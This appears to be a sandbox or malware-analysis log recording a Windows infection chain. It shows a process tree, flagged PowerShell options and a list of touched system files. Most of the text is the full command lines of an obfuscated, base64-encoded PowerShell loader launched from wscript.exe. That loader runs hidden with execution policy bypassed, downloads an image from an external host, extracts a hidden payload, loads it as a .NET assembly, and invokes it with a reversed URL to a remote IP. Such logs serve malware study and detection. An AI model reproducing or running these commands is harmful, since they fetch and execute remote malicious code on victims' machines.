◀▶FM◀▶eQBz◀▶HQ◀▶ZQBt◀▶C4◀▶TgBl◀▶HQ◀▶LgBX◀▶GU◀▶YgBD◀▶Gw◀▶aQBl◀▶G4◀▶d◀▶◀▶7◀▶CQ◀▶aQBt◀▶GE◀▶ZwBl◀▶EI◀▶eQB0◀▶GU◀▶cw◀▶g◀▶D0◀▶I◀▶◀▶k◀▶Hc◀▶ZQBi◀▶EM◀▶b◀▶Bp◀▶GU◀▶bgB0◀▶C4◀▶R◀▶Bv◀▶Hc◀▶bgBs◀▶G8◀▶YQBk◀▶EQ◀▶YQB0◀▶GE◀▶K◀▶◀▶k◀▶Gk◀▶bQBh◀▶Gc◀▶ZQBV◀▶HI◀▶b◀▶◀▶p◀▶Ds◀▶J◀▶Bp◀▶G0◀▶YQBn◀▶GU◀▶V◀▶Bl◀▶Hg◀▶d◀▶◀▶g◀▶D0◀▶I◀▶Bb◀▶FM◀▶eQBz◀▶HQ◀▶ZQBt◀▶C4◀▶V◀▶Bl◀▶Hg◀▶d◀▶◀▶u◀▶EU◀▶bgBj◀▶G8◀▶Z◀▶Bp◀▶G4◀▶ZwBd◀▶Do◀▶OgBV◀▶FQ◀▶Rg◀▶4◀▶C4◀▶RwBl◀▶HQ◀▶UwB0◀▶HI◀▶aQBu◀▶Gc◀▶K◀▶◀▶k◀▶Gk◀▶bQBh◀▶Gc◀▶ZQBC◀▶Hk◀▶d◀▶Bl◀▶HM◀▶KQ◀▶7◀▶CQ◀▶cwB0◀▶GE◀▶cgB0◀▶EY◀▶b◀▶Bh◀▶Gc◀▶I◀▶◀▶9◀▶C◀▶◀▶Jw◀▶8◀▶Dw◀▶QgBB◀▶FM◀▶RQ◀▶2◀▶DQ◀▶XwBT◀▶FQ◀▶QQBS◀▶FQ◀▶Pg◀▶+◀▶Cc◀▶Ow◀▶k◀▶GU◀▶bgBk◀▶EY◀▶b◀▶Bh◀▶Gc◀▶I◀▶◀▶9◀▶C◀▶◀▶Jw◀▶8◀▶Dw◀▶QgBB◀▶FM◀▶RQ◀▶2◀▶DQ◀▶XwBF◀▶E4◀▶R◀▶◀▶+◀▶D4◀▶Jw◀▶7◀▶CQ◀▶cwB0◀▶GE◀▶cgB0◀▶Ek◀▶bgBk◀▶GU◀▶e◀▶◀▶g◀▶D0◀▶I◀▶◀▶k◀▶Gk◀▶bQBh◀▶Gc◀▶ZQBU◀▶GU◀▶e◀▶B0◀▶C4◀▶SQBu◀▶GQ◀▶ZQB4◀▶E8◀▶Zg◀▶o◀▶CQ◀▶cwB0◀▶GE◀▶cgB0◀▶EY◀▶b◀▶Bh◀▶Gc◀▶KQ◀▶7◀▶CQ◀▶ZQBu◀▶GQ◀▶SQBu◀▶GQ◀▶ZQB4◀▶C◀▶◀▶PQ◀▶g◀▶CQ◀▶aQBt◀▶GE◀▶ZwBl◀▶FQ◀▶ZQB4◀▶HQ◀▶LgBJ◀▶G4◀▶Z◀▶Bl◀▶Hg◀▶TwBm◀▶Cg◀▶J◀▶Bl◀▶G4◀▶Z◀▶BG◀▶Gw◀▶YQBn◀▶Ck◀▶Ow◀▶k◀▶HM◀▶d◀▶Bh◀▶HI◀▶d◀▶BJ◀▶G4◀▶Z◀▶Bl◀▶Hg◀▶I◀▶◀▶t◀▶Gc◀▶ZQ◀▶g◀▶D◀▶◀▶I◀▶◀▶t◀▶GE◀▶bgBk◀▶C◀▶◀▶J◀▶Bl◀▶G4◀▶Z◀▶BJ◀▶G4◀▶Z◀▶Bl◀▶Hg◀▶I◀▶◀▶t◀▶Gc◀▶d◀▶◀▶g◀▶CQ◀▶cwB0◀▶GE◀▶cgB0◀▶Ek◀▶bgBk◀▶GU◀▶e◀▶◀▶7◀▶CQ◀▶cwB0◀▶GE◀▶cgB0◀▶Ek◀▶bgBk◀▶GU◀▶e◀▶◀▶g◀▶Cs◀▶PQ◀▶g◀▶CQ◀▶cwB0◀▶GE◀▶cgB0◀▶EY◀▶b◀▶Bh◀▶Gc◀▶LgBM◀▶GU◀▶bgBn◀▶HQ◀▶a◀▶◀▶7◀▶CQ◀▶YgBh◀▶HM◀▶ZQ◀▶2◀▶DQ◀▶T◀▶Bl◀▶G4◀▶ZwB0◀▶Gg◀▶I◀▶◀▶9◀▶C◀▶◀▶J◀▶Bl◀▶G4◀▶Z◀▶BJ◀▶G4◀▶Z◀▶Bl◀▶Hg◀▶I◀▶◀▶t◀▶C◀▶◀▶J◀▶Bz◀▶HQ◀▶YQBy◀▶HQ◀▶SQBu◀▶GQ◀▶ZQB4◀▶Ds◀▶J◀▶Bi◀▶GE◀▶cwBl◀▶DY◀▶N◀▶BD◀▶G8◀▶bQBt◀▶GE◀▶bgBk◀▶C◀▶◀▶PQ◀▶g◀▶CQ◀▶aQBt◀▶GE◀▶ZwBl◀▶FQ◀▶ZQB4◀▶HQ◀▶LgBT◀▶HU◀▶YgBz◀▶HQ◀▶cgBp◀▶G4◀▶Zw◀▶o◀▶CQ◀▶cwB0◀▶GE◀▶cgB0◀▶Ek◀▶bgBk◀▶GU◀▶e◀▶◀▶s◀▶C◀▶◀▶J◀▶Bi◀▶GE◀▶cwBl◀▶DY◀▶N◀▶BM◀▶GU◀▶bgBn◀▶HQ◀▶a◀▶◀▶p◀▶Ds◀▶J◀▶Bj◀▶G8◀▶bQBt◀▶GE◀▶bgBk◀▶EI◀▶eQB0◀▶GU◀▶cw◀▶g◀▶D0◀▶I◀▶Bb◀▶FM◀▶eQBz◀▶HQ◀▶ZQBt◀▶C4◀▶QwBv◀▶G4◀▶dgBl◀▶HI◀▶d◀▶Bd◀▶Do◀▶OgBG◀▶HI◀▶bwBt◀▶EI◀▶YQBz◀▶GU◀▶Ng◀▶0◀▶FM◀▶d◀▶By◀▶Gk◀▶bgBn◀▶Cg◀▶J◀▶Bi◀▶GE◀▶cwBl◀▶DY◀▶N◀▶BD◀▶G8◀▶bQBt◀▶GE◀▶bgBk◀▶Ck◀▶Ow◀▶k◀▶Gw◀▶bwBh◀▶GQ◀▶ZQBk◀▶EE◀▶cwBz◀▶GU◀▶bQBi◀▶Gw◀▶eQ◀▶g◀▶D0◀▶I◀▶Bb◀▶FM◀▶eQBz◀▶HQ◀▶ZQBt◀▶C4◀▶UgBl◀▶GY◀▶b◀▶Bl◀▶GM◀▶d◀▶Bp◀▶G8◀▶bg◀▶u◀▶EE◀▶cwBz◀▶GU◀▶bQBi◀▶Gw◀▶eQBd◀▶Do◀▶OgBM◀▶G8◀▶YQBk◀▶Cg◀▶J◀▶Bj◀▶G8◀▶bQBt◀▶GE◀▶bgBk◀▶EI◀▶eQB0◀▶GU◀▶cw◀▶p◀▶Ds◀▶J◀▶B0◀▶Hk◀▶c◀▶Bl◀▶C◀▶◀▶PQ◀▶g◀▶CQ◀▶b◀▶Bv◀▶GE◀▶Z◀▶Bl◀▶GQ◀▶QQBz◀▶HM◀▶ZQBt◀▶GI◀▶b◀▶B5◀▶C4◀▶RwBl◀▶HQ◀▶V◀▶B5◀▶H◀▶◀▶ZQ◀▶o◀▶Cc◀▶RgBp◀▶GI◀▶ZQBy◀▶C4◀▶S◀▶Bv◀▶G0◀▶ZQ◀▶n◀▶Ck◀▶Ow◀▶k◀▶G0◀▶ZQB0◀▶Gg◀▶bwBk◀▶C◀▶◀▶PQ◀▶g◀▶CQ◀▶d◀▶B5◀▶H◀▶◀▶ZQ◀▶u◀▶Ec◀▶ZQB0◀▶E0◀▶ZQB0◀▶Gg◀▶bwBk◀▶Cg◀▶JwBW◀▶EE◀▶SQ◀▶n◀▶Ck◀▶LgBJ◀▶G4◀▶dgBv◀▶Gs◀▶ZQ◀▶o◀▶CQ◀▶bgB1◀▶Gw◀▶b◀▶◀▶s◀▶C◀▶◀▶WwBv◀▶GI◀▶agBl◀▶GM◀▶d◀▶Bb◀▶F0◀▶XQ◀▶g◀▶Cg◀▶JwB0◀▶Hg◀▶d◀▶◀▶u◀▶DQ◀▶Mg◀▶0◀▶DM◀▶cgBn◀▶C8◀▶b◀▶B0◀▶C8◀▶Nw◀▶2◀▶DE◀▶Lg◀▶x◀▶DY◀▶MQ◀▶u◀▶DY◀▶NQ◀▶x◀▶C4◀▶N◀▶◀▶5◀▶C8◀▶Lw◀▶6◀▶H◀▶◀▶d◀▶B0◀▶Gg◀▶Jw◀▶g◀▶Cw◀▶I◀▶◀▶n◀▶GI◀▶bwBz◀▶HQ◀▶YQ◀▶n◀▶Ck◀▶KQ◀▶='";$OWjuxd = [system.Text.encoding]::Unicode.GetString("[system.Convert]::Frombase64string( $codigo.replace('◀▶','A') ))";powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD""
parent_process wscript.exe martian_process "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$Codigo = 'J◀▶Bp◀▶G0◀▶YQBn◀▶GU◀▶VQBy◀▶Gw◀▶I◀▶◀▶9◀▶C◀▶◀▶JwBo◀▶HQ◀▶d◀▶Bw◀▶HM◀▶Og◀▶v◀▶C8◀▶dQBw◀▶Gw◀▶bwBh◀▶GQ◀▶Z◀▶Bl◀▶Gk◀▶bQBh◀▶Gc◀▶ZQBu◀▶HM◀▶LgBj◀▶G8◀▶bQ◀▶u◀▶GI◀▶cg◀▶v◀▶Gk◀▶bQBh◀▶Gc◀▶ZQBz◀▶C8◀▶M◀▶◀▶w◀▶DQ◀▶Lw◀▶2◀▶DE◀▶Mw◀▶v◀▶DU◀▶MQ◀▶1◀▶C8◀▶bwBy◀▶Gk◀▶ZwBp◀▶G4◀▶YQBs◀▶C8◀▶cgB1◀▶G0◀▶c◀▶Bf◀▶HY◀▶YgBz◀▶F8◀▶YQBu◀▶HQ◀▶aQB2◀▶G0◀▶LgBq◀▶H◀▶◀▶Zw◀▶/◀▶DE◀▶Ng◀▶5◀▶DU◀▶MQ◀▶0◀▶Dc◀▶Mg◀▶1◀▶DU◀▶Jw◀▶7◀▶CQ◀▶dwBl◀▶GI◀▶QwBs◀▶Gk◀▶ZQBu◀▶HQ◀▶I◀▶◀▶9◀▶C◀▶◀▶TgBl◀▶Hc◀▶LQBP◀▶GI◀▶agBl◀▶GM◀▶d◀▶◀▶g◀▶FM◀▶eQBz◀▶HQ◀▶ZQBt◀▶C4◀▶TgBl◀▶HQ◀▶LgBX◀▶GU◀▶YgBD◀▶Gw◀▶aQBl◀▶G4◀▶d◀▶◀▶7◀▶CQ◀▶aQBt◀▶GE◀▶ZwBl◀▶EI◀▶eQB0◀▶GU◀▶cw◀▶g◀▶D0◀▶I◀▶◀▶k◀▶Hc◀▶ZQBi◀▶EM◀▶b◀▶Bp◀▶GU◀▶bgB0◀▶C4◀▶R◀▶Bv◀▶Hc◀▶bgBs◀▶G8◀▶YQBk◀▶EQ◀▶YQB0◀▶GE◀▶K◀▶◀▶k◀▶Gk◀▶bQBh◀▶Gc◀▶ZQBV◀▶HI◀▶b◀▶◀▶p◀▶Ds◀▶J◀▶Bp◀▶G0◀▶YQBn◀▶GU◀▶V◀▶Bl◀▶Hg◀▶d◀▶◀▶g◀▶D0◀▶I◀▶Bb◀▶FM◀▶eQBz◀▶HQ◀▶ZQBt◀▶C4◀▶V◀▶Bl◀▶Hg◀▶d◀▶◀▶u◀▶EU◀▶bgBj◀▶G8◀▶Z◀▶Bp◀▶G4◀▶ZwBd◀▶Do◀▶OgBV◀▶FQ◀▶Rg◀▶4◀▶C4◀▶RwBl◀▶HQ◀▶UwB0◀▶HI◀▶aQBu◀▶Gc◀▶K◀▶◀▶k◀▶Gk◀▶bQBh◀▶Gc◀▶ZQBC◀▶Hk◀▶d◀▶Bl◀▶HM◀▶KQ◀▶7◀▶CQ◀▶cwB0◀▶GE◀▶cgB0◀▶EY◀▶b◀▶Bh◀▶Gc◀▶I◀▶◀▶9◀▶C◀▶◀▶Jw◀▶8◀▶Dw◀▶QgBB◀▶FM◀▶RQ◀▶2◀▶DQ◀▶XwBT◀▶FQ◀▶QQBS◀▶FQ◀▶Pg◀▶+◀▶Cc◀▶Ow◀▶k◀▶GU◀▶bgBk◀▶EY◀▶b◀▶Bh◀▶Gc◀▶I◀▶◀▶9◀▶C◀▶◀▶Jw◀▶8◀▶Dw◀▶QgBB◀▶FM◀▶RQ◀▶2◀▶DQ◀▶XwBF◀▶E4◀▶R◀▶◀▶+◀▶D4◀▶Jw◀▶7◀▶CQ◀▶cwB0◀▶GE◀▶cgB0◀▶Ek◀▶bgBk◀▶GU◀▶e◀▶◀▶g◀▶D0◀▶I◀▶◀▶k◀▶Gk◀▶bQBh◀▶Gc◀▶ZQBU◀▶GU◀▶e◀▶B0◀▶C4◀▶SQBu◀▶GQ◀▶ZQB4◀▶E8◀▶Zg◀▶o◀▶CQ◀▶cwB0◀▶GE◀▶cgB0◀▶EY◀▶b◀▶Bh◀▶Gc◀▶KQ◀▶7◀▶CQ◀▶ZQBu◀▶GQ◀▶SQBu◀▶GQ◀▶ZQB4◀▶C◀▶◀▶PQ◀▶g◀▶CQ◀▶aQBt◀▶GE◀▶ZwBl◀▶FQ◀▶ZQB4◀▶HQ◀▶LgBJ◀▶G4◀▶Z◀▶Bl◀▶Hg◀▶TwBm◀▶Cg◀▶J◀▶Bl◀▶G4◀▶Z◀▶BG◀▶Gw◀▶YQBn◀▶Ck◀▶Ow◀▶k◀▶HM◀▶d◀▶Bh◀▶HI◀▶d◀▶BJ◀▶G4◀▶Z◀▶Bl◀▶Hg◀▶I◀▶◀▶t◀▶Gc◀▶ZQ◀▶g◀▶D◀▶◀▶I◀▶◀▶t◀▶GE◀▶bgBk◀▶C◀▶◀▶J◀▶Bl◀▶G4◀▶Z◀▶BJ◀▶G4◀▶Z◀▶Bl◀▶Hg◀▶I◀▶◀▶t◀▶Gc◀▶d◀▶◀▶g◀▶CQ◀▶cwB0◀▶GE◀▶cgB0◀▶Ek◀▶bgBk◀▶GU◀▶e◀▶◀▶7◀▶CQ◀▶cwB0◀▶GE◀▶cgB0◀▶Ek◀▶bgBk◀▶GU◀▶e◀▶◀▶g◀▶Cs◀▶PQ◀▶g◀▶CQ◀▶cwB0◀▶GE◀▶cgB0◀▶EY◀▶b◀▶Bh◀▶Gc◀▶LgBM◀▶GU◀▶bgBn◀▶HQ◀▶a◀▶◀▶7◀▶CQ◀▶YgBh◀▶HM◀▶ZQ◀▶2◀▶DQ◀▶T◀▶Bl◀▶G4◀▶ZwB0◀▶Gg◀▶I◀▶◀▶9◀▶C◀▶◀▶J◀▶Bl◀▶G4◀▶Z◀▶BJ◀▶G4◀▶Z◀▶Bl◀▶Hg◀▶I◀▶◀▶t◀▶C◀▶◀▶J◀▶Bz◀▶HQ◀▶YQBy◀▶HQ◀▶SQBu◀▶GQ◀▶ZQB4◀▶Ds◀▶J◀▶Bi◀▶GE◀▶cwBl◀▶DY◀▶N◀▶BD◀▶G8◀▶bQBt◀▶GE◀▶bgBk◀▶C◀▶◀▶PQ◀▶g◀▶CQ◀▶aQBt◀▶GE◀▶ZwBl◀▶FQ◀▶ZQB4◀▶HQ◀▶LgBT◀▶HU◀▶YgBz◀▶HQ◀▶cgBp◀▶G4◀▶Zw◀▶o◀▶CQ◀▶cwB0◀▶GE◀▶cgB0◀▶Ek◀▶bgBk◀▶GU◀▶e◀▶◀▶s◀▶C◀▶◀▶J◀▶Bi◀▶GE◀▶cwBl◀▶DY◀▶N◀▶BM◀▶GU◀▶bgBn◀▶HQ◀▶a◀▶◀▶p◀▶Ds◀▶J◀▶Bj◀▶G8◀▶bQBt◀▶GE◀▶bgBk◀▶EI◀▶eQB0◀▶GU◀▶cw◀▶g◀▶D0◀▶I◀▶Bb◀▶FM◀▶eQBz◀▶HQ◀▶ZQBt◀▶C4◀▶QwBv◀▶G4◀▶dgBl◀▶HI◀▶d◀▶Bd◀▶Do◀▶OgBG◀▶HI◀▶bwBt◀▶EI◀▶YQBz◀▶GU◀▶Ng◀▶0◀▶FM◀▶d◀▶By◀▶Gk◀▶bgBn◀▶Cg◀▶J◀▶Bi◀▶GE◀▶cwBl◀▶DY◀▶N◀▶BD◀▶G8◀▶bQBt◀▶GE◀▶bgBk◀▶Ck◀▶Ow◀▶k◀▶Gw◀▶bwBh◀▶GQ◀▶ZQBk◀▶EE◀▶cwBz◀▶GU◀▶bQBi◀▶Gw◀▶eQ◀▶g◀▶D0◀▶I◀▶Bb◀▶FM◀▶eQBz◀▶HQ◀▶ZQBt◀▶C4◀▶UgBl◀▶GY◀▶b◀▶Bl◀▶GM◀▶d◀▶Bp◀▶G8◀▶bg◀▶u◀▶EE◀▶cwBz◀▶GU◀▶bQBi◀▶Gw◀▶eQBd◀▶Do◀▶OgBM◀▶G8◀▶YQBk◀▶Cg◀▶J◀▶Bj◀▶G8◀▶bQBt◀▶GE◀▶bgBk◀▶EI◀▶eQB0◀▶GU◀▶cw◀▶p◀▶Ds◀▶J◀▶B0◀▶Hk◀▶c◀▶Bl◀▶C◀▶◀▶PQ◀▶g◀▶CQ◀▶b◀▶Bv◀▶GE◀▶Z◀▶Bl◀▶GQ◀▶QQBz◀▶HM◀▶ZQBt◀▶GI◀▶b◀▶B5◀▶C4◀▶RwBl◀▶HQ◀▶V◀▶B5◀▶H◀▶◀▶ZQ◀▶o◀▶Cc◀▶RgBp◀▶GI◀▶ZQBy◀▶C4◀▶S◀▶Bv◀▶G0◀▶ZQ◀▶n◀▶Ck◀▶Ow◀▶k◀▶G0◀▶ZQB0◀▶Gg◀▶bwBk◀▶C◀▶◀▶PQ◀▶g◀▶CQ◀▶d◀▶B5◀▶H◀▶◀▶ZQ◀▶u◀▶Ec◀▶ZQB0◀▶E0◀▶ZQB0◀▶Gg◀▶bwBk◀▶Cg◀▶JwBW◀▶EE◀▶SQ◀▶n◀▶Ck◀▶LgBJ◀▶G4◀▶dgBv◀▶Gs◀▶ZQ◀▶o◀▶CQ◀▶bgB1◀▶Gw◀▶b◀▶◀▶s◀▶C◀▶◀▶WwBv◀▶GI◀▶agBl◀▶GM◀▶d◀▶Bb◀▶F0◀▶XQ◀▶g◀▶Cg◀▶JwB0◀▶Hg◀▶d◀▶◀▶u◀▶DQ◀▶Mg◀▶0◀▶DM◀▶cgBn◀▶C8◀▶b◀▶B0◀▶C8◀▶Nw◀▶2◀▶DE◀▶Lg◀▶x◀▶DY◀▶MQ◀▶u◀▶DY◀▶NQ◀▶x◀▶C4◀▶N◀▶◀▶5◀▶C8◀▶Lw◀▶6◀▶H◀▶◀▶d◀▶B0◀▶Gg◀▶Jw◀▶g◀▶Cw◀▶I◀▶◀▶n◀▶GI◀▶bwBz◀▶HQ◀▶YQ◀▶n◀▶Ck◀▶KQ◀▶='";$OWjuxd = [system.Text.encoding]::Unicode.GetString("[system.Convert]::Frombase64string( $codigo.replace('◀▶','A') ))";powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD""
parent_process powershell.exe martian_process "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://uploaddeimagens.com.br/images/004/613/515/original/rump_vbs_antivm.jpg?1695147255';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('Fiber.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.4243rg/lt/761.161.651.49//:ptth' , 'bosta'))"
option -executionpolicy bypass value Attempts to bypass execution policy
option -noprofile value Does not load current user profile
option -windowstyle hidden value Attempts to execute command with a hidden window
option -executionpolicy bypass value Attempts to bypass execution policy
option -noprofile value Does not load current user profile
option -windowstyle hidden value Attempts to execute command with a hidden window
option -executionpolicy bypass value Attempts to bypass execution policy
option -noprofile value Does not load current user profile
option -windowstyle hidden value Attempts to execute command with a hidden window
file C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
file C:\Windows\System32\ie4uinit.exe
file C:\Program Files\Windows Sidebar\sidebar.exe
file C:\Windows\System32\WindowsAnytimeUpgradeUI.exe
file C:\Windows\System32\xpsrchvw.exe
file C:\Windows\System32\displayswitch.exe
file C:\Program Files\Common Files\Microsoft Shared\ink\mip.exe
file C:\Windows\System32\mblctr.exe
file C:\Windows\System32\mstsc.exe
file C:\Windows\System32\SnippingTool.exe
file C:\Windows\System32\SoundRecorder.exe
file C:\Windows\System32\dfrgui.exe
file C:\Windows\System32\msinfo32.exe
file C:\Windows\System32\rstrui.exe
file C:\Program Files\Common Files\Microsoft Shared\ink\ShapeCollector.exe
file C:\Program Files\Windows Journal\Journal.exe
file C:\Windows\System32\MdSched.exe
file C:\Windows\System32\msconfig.exe
file C:\Windows\System32\recdisc.exe
file C:\Windows\System32\msra.exe